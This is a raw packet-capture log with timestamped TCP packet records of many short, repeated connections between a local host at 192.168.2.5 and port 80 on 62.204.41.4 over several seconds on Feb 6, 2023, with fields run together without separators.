                                                        Feb 6, 2023 14:18:00.255212069 CET4995580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.314004898 CET804995462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.314177036 CET4995480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.316899061 CET804995562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.317079067 CET4995580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.317508936 CET4995580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.379189968 CET804995562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.382448912 CET804995562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.382581949 CET4995580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.489070892 CET4995580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.489984989 CET4995680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.550841093 CET804995562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.550972939 CET4995580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.552565098 CET804995662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.552676916 CET4995680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.553096056 CET4995680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.615793943 CET804995662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.618180990 CET804995662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.618283033 CET4995680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.724831104 CET4995680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.725745916 CET4995780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.787727118 CET804995662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.787836075 CET4995680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.788188934 CET804995762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.788276911 CET4995780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.788641930 CET4995780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.851094961 CET804995762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.854032993 CET804995762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:00.854280949 CET4995780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.959079027 CET4995780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:00.959954977 CET4995880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.021198034 CET804995862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.021312952 CET4995880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.021646023 CET804995762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.021758080 CET4995780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.022167921 CET4995880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.083314896 CET804995862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.087373018 CET804995862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.087461948 CET4995880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.192006111 CET4995880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.192851067 CET4995980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.253388882 CET804995962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.253452063 CET804995862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.253518105 CET4995980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.253562927 CET4995880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.254903078 CET4995980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.315448999 CET804995962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.318948984 CET804995962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.319132090 CET4995980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.426681042 CET4995980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.428457975 CET4996080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.487407923 CET804995962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.487683058 CET804996062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.487790108 CET4995980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.487833977 CET4996080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.488614082 CET4996080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.547792912 CET804996062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.551234961 CET804996062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.551346064 CET4996080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.664623976 CET4996080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.665641069 CET4996180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.724451065 CET804996062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.724620104 CET4996080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.727319002 CET804996162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.731468916 CET4996180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.749516010 CET4996180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.811234951 CET804996162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.814297915 CET804996162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.814496994 CET4996180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.930131912 CET4996180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.930865049 CET4996280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.991971970 CET804996162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.993475914 CET4996180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:01.993483067 CET804996262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:01.993607998 CET4996280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.000570059 CET4996280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.063191891 CET804996262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.069396973 CET804996262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.074829102 CET4996280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.180293083 CET4996280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.181193113 CET4996380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.242913008 CET804996362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.243114948 CET4996380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.243323088 CET804996262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.243438959 CET4996280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.243571997 CET4996380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.306564093 CET804996362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.309935093 CET804996362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.310353994 CET4996380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.426249027 CET4996380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.426912069 CET4996480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.488504887 CET804996362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.488693953 CET4996380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.489018917 CET804996462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.489144087 CET4996480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.489491940 CET4996480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.550925970 CET804996462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.553540945 CET804996462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.553637028 CET4996480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.661108971 CET4996480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.661664009 CET4996580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.722213030 CET804996562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.722385883 CET4996580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.722630024 CET804996462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.722707987 CET4996480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.723607063 CET4996580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.785056114 CET804996562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.786803007 CET804996562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.786911011 CET4996580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.895222902 CET4996580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.896389008 CET4996680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.956497908 CET804996562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.956628084 CET4996580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.958812952 CET804996662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:02.958945990 CET4996680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:02.959271908 CET4996680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.019980907 CET804996662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.022351027 CET804996662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.022479057 CET4996680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.129595995 CET4996680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.130362034 CET4996780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.190814972 CET804996662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.191070080 CET4996680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.192506075 CET804996762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.192631960 CET4996780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.193008900 CET4996780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.254303932 CET804996762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.259531975 CET804996762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.259685040 CET4996780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.363532066 CET4996780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.364197016 CET4996880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.425101995 CET804996862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.425152063 CET804996762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.425244093 CET4996880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.425287008 CET4996780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.426820993 CET4996880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.487651110 CET804996862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.490326881 CET804996862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.490422010 CET4996880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.603157043 CET4996880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.604159117 CET4996980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.664554119 CET804996862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.664597988 CET804996962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.664648056 CET4996880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.664756060 CET4996980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.665185928 CET4996980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.725414038 CET804996962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.728063107 CET804996962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.728144884 CET4996980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.833055973 CET4996980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.833796978 CET4997080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.893482924 CET804996962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.893598080 CET4996980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.894037008 CET804997062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.894150019 CET4997080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.894707918 CET4997080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:03.954884052 CET804997062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.957648993 CET804997062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:03.957786083 CET4997080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.067100048 CET4997080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.067745924 CET4997180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.127501965 CET804997162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.127549887 CET804997062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.127599001 CET4997180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.127674103 CET4997080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.128226995 CET4997180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.187696934 CET804997162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.192429066 CET804997162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.192512035 CET4997180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.301333904 CET4997180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.302114964 CET4997280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.360871077 CET804997162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.361036062 CET4997180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.362814903 CET804997262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.364384890 CET4997280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.364384890 CET4997280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.425178051 CET804997262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.428808928 CET804997262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.428919077 CET4997280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.536222935 CET4997280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.537185907 CET4997380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.596944094 CET804997262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.597647905 CET804997362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.597865105 CET4997380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.597861052 CET4997280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.598156929 CET4997380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.658390999 CET804997362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.660758972 CET804997362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.663727045 CET4997380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.770642042 CET4997380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.771358967 CET4997480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.831311941 CET804997362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.831523895 CET4997380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.837142944 CET804997462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.837357998 CET4997480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.837733984 CET4997480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:04.899997950 CET804997462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.902610064 CET804997462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:04.907151937 CET4997480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.020948887 CET4997480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.021933079 CET4997580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.082588911 CET804997562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.083393097 CET804997462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.083631992 CET4997480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.084398031 CET4997580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.084398031 CET4997580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.145181894 CET804997562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.149620056 CET804997562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.152421951 CET4997580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.254482985 CET4997580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.255168915 CET4997680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.315337896 CET804997562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.317234039 CET4997580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.318025112 CET804997662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.318162918 CET4997680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.318607092 CET4997680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.381220102 CET804997662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.384452105 CET804997662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.386436939 CET4997680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.488993883 CET4997680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.489896059 CET4997780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.551285982 CET804997762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.551470995 CET4997780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.551811934 CET804997662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.551918030 CET4997680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.552321911 CET4997780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.613500118 CET804997762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.615860939 CET804997762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.616028070 CET4997780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.727147102 CET4997780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.727993011 CET4997880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.788563013 CET804997762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.788750887 CET4997780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.789397001 CET804997862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.789539099 CET4997880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.789921045 CET4997880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.851466894 CET804997862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.854299068 CET804997862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:05.854459047 CET4997880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.959477901 CET4997880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:05.962671041 CET4997980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.022170067 CET804997862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.022380114 CET4997880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.023282051 CET804997962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.023653030 CET4997980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.054835081 CET4997980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.114515066 CET804997962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.118680954 CET804997962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.119630098 CET4997980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.240117073 CET4997980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.240679026 CET4998080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.303713083 CET804997962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.304155111 CET804998062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.304245949 CET4997980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.304275990 CET4998080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.304827929 CET4998080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.365093946 CET804998062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.367547035 CET804998062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.367736101 CET4998080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.473181009 CET4998080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.474124908 CET4998180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.533813953 CET804998062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.533927917 CET4998080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.534441948 CET804998162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.534554005 CET4998180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.537805080 CET4998180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.599334002 CET804998162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.602508068 CET804998162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.602632999 CET4998180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.708213091 CET4998180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.709114075 CET4998280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.768894911 CET804998162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.768999100 CET4998180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.769452095 CET804998262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.771720886 CET4998280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.788989067 CET4998280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.849338055 CET804998262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.852390051 CET804998262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:06.855730057 CET4998280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.971553087 CET4998380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:06.972691059 CET4998280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.033020020 CET804998262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.033065081 CET804998362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.033198118 CET4998380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.033596039 CET4998380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.035772085 CET4998280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.094907999 CET804998362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.099112988 CET804998362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.099262953 CET4998380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.208214045 CET4998380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.208961964 CET4998480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.271323919 CET804998462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.271435022 CET4998480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.272104025 CET804998362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.272187948 CET4998380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.273531914 CET4998480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.334327936 CET804998462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.337085009 CET804998462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.337187052 CET4998480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.454543114 CET4998480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.454624891 CET4998580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.515178919 CET804998562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.515413046 CET804998462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.515609980 CET4998480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.516140938 CET4998580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.516140938 CET4998580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.576524973 CET804998562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.578883886 CET804998562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.579015017 CET4998580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.692558050 CET4998580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.693397999 CET4998680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.762300014 CET804998562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.762357950 CET804998662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.762494087 CET4998580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.762546062 CET4998680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.762954950 CET4998680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.824271917 CET804998662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.826908112 CET804998662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:07.827116013 CET4998680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.942643881 CET4998680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:07.944364071 CET4998780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.003860950 CET804998762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.004300117 CET804998662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.004373074 CET4998680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.004990101 CET4998780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.011491060 CET4998780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.070787907 CET804998762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.074615002 CET804998762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.074825048 CET4998780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.194608927 CET4998780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.209014893 CET4998880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.254157066 CET804998762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.259881020 CET4998780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.269649982 CET804998862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.269880056 CET4998880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.271365881 CET4998880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.332041979 CET804998862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.335114002 CET804998862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.335299015 CET4998880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.442753077 CET4998880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.443440914 CET4998980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.503072023 CET804998962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.503268003 CET4998980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.503501892 CET804998862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.503592968 CET4998880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.504518032 CET4998980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:08.564099073 CET804998962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:08.566998959 CET804998962.204.41.4192.168.2.5
